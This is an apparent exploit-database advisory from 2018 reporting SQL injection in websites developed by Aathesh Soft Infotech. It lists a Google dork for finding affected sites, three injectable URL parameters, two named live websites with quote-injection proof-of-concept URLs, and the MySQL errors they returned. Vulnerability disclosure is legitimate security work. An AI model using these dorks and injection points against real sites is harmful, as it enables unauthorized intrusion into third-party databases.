Developed by Aathesh Soft Infotech Pvt Ltd SQL Injection Vulnerability

2018.09.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : Developed by Aathesh Soft Infotech Pvt Ltd SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 28/09/2018 # Vendor Homepage : aatheshsoft.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Developed by Aathesh Soft Infotech Pvt Ltd'' # Exploit : /product.php?id=[SQL Injection] /singleproduct.php?prod_id=[SQL Injection] /products.php?mcid=[ID-NUMBER]&scid=[SQL Injection] ################################################################################################# # Example Site => ryncoorchids.com/product.php?id=3%27 => [ Proof of Concept ] => archive.is/B7CB5 kaliswarifireworkscockbrand.com/products.php?mcid=2&scid=8%27 => [ Proof of Concept ] => archive.is/9DgLU # SQL Database Error => select * from tbl_category where cat_status='Y' and cat_id='3'' 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3''' at line 1 select * from category where category_id='8'' and active='1' order by rank 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' order by rank' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top